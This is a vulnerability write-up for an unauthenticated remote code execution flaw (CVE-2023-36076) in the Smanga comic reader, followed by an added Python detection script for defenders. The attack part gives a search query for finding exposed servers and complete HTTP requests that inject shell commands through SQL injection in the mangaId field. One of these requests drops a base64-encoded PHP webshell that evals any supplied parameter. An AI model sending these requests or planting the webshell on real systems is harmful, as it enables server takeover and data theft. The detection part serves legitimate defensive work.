
Smanga Unauthenticated Remote Code Execution Vulnerability (CVE-2023-36076)

1. Vulnerability Overview

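Smanga is a zero-configuration comic streaming reader that installs directly with Docker. Inspired by Emby and Plex, it was developed to meet comic-reading needs. The /php/manga/delete.php endpoint has an unauthenticated remote code execution vulnerability: an attacker can execute arbitrary commands on the target host and gain control of the server.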

2. Affected Versions

  • Smanga

3. Asset Discovery

  • Hunter: web.title=="smanga"
  • Fingerprint: shown as a screenshot in the original post

4. Vulnerability Reproduction

POST /php/manga/delete.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
If-None-Match: "63ff3602-c6d"
If-Modified-Since: Wed, 01 Mar 2023 11:24:50 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 360

mangaId=1 union select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select '\";echo `whoami` > 1.txt;\"')e join (select 6)f join (select 7)g join (select 8)h join (select 9)i join (select 10)j join (select 11)k join (select 12)l;&deleteFile=true

Retrieve the command execution result:

GET /php/manga/1.txt HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0

Write a webshell:

POST /php/manga/delete.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
If-None-Match: "63ff3602-c6d"
If-Modified-Since: Wed, 01 Mar 2023 11:24:50 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 360

mangaId=1 union select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select '\";echo PD9waHAgY2xhc3MgR3c2UVBoNjYgeyBwdWJsaWMgZnVuY3Rpb24gX19jb25zdHJ1Y3QoJEg4OTBhKXsgQGV2YWwoIi8qWjlZczlnSVY3MyovIi4kSDg5MGEuIi8qWjlZczlnSVY3MyovIik7IH19bmV3IEd3NlFQaDY2KCRfUkVRVUVTVFsneCddKTs/Pg== | base64 -d > 1.php;\"')e join (select 6)f join (select 7)g join (select 8)h join (select 9)i join (select 10)j join (select 11)k join (select 12)l;&deleteFile=true

Webshell path:

/php/manga/1.php
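
For defenders reviewing captured traffic, the following is an added example (not part of the original write-up and not Smanga's own code): it flags POSTs to /php/manga/delete.php whose mangaId is not a plain integer, then flags later requests by the same client for other files under /php/manga/, which is where the requests above read command output and place the webshell. The record format (client IP plus raw request text), the function names and the sample traffic are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs

ENDPOINT = "/php/manga/delete.php"   # vulnerable endpoint named on the page
DROP_DIR = "/php/manga/"             # directory the page's follow-up requests read from

def parse(raw):
    """Split a raw HTTP/1.1 request into (method, path, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    method, target, _ = head.split("\n", 1)[0].split(" ", 2)
    return method, target.split("?", 1)[0], body.strip()

def bad_manga_id(body):
    """Return the mangaId value if it is anything other than a plain integer."""
    # separator="&" keeps values containing ';' intact on every Python version
    params = parse_qs(body, keep_blank_values=True, separator="&")
    for value in params.get("mangaId", []):
        if not re.fullmatch(r"\d+", value.strip()):
            return value
    return None

def scan(records):
    """records: iterable of (client_ip, raw_request). Returns a list of findings."""
    findings, flagged = [], set()
    for client, raw in records:
        method, path, body = parse(raw)
        if method == "POST" and path == ENDPOINT:
            value = bad_manga_id(body)
            if value is not None:
                flagged.add(client)
                findings.append((client, "non-integer mangaId", value[:40]))
        elif client in flagged and path.startswith(DROP_DIR) and path != ENDPOINT:
            # Same client later reads a file beside delete.php: possible output file or webshell
            findings.append((client, "follow-up fetch", path))
    return findings

# Constructed sample traffic (not from the original page); the injected value is abbreviated.
SAMPLE = [
    ("198.51.100.7", "POST /php/manga/delete.php HTTP/1.1\nHost: example.test\n\nmangaId=12&deleteFile=true"),
    ("203.0.113.9", "POST /php/manga/delete.php HTTP/1.1\nHost: example.test\n\nmangaId=1 union select 1&deleteFile=true"),
    ("203.0.113.9", "GET /php/manga/1.txt HTTP/1.1\nHost: example.test\n\n"),
    ("198.51.100.7", "GET /php/manga/1.txt HTTP/1.1\nHost: example.test\n\n"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Request bodies are rarely present in default web server access logs, so this needs a source that records them, such as a reverse proxy or WAF capture.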


Original: https://www.yuque.com/xiaokp7/ocvun2/fgwxzim62xadgc33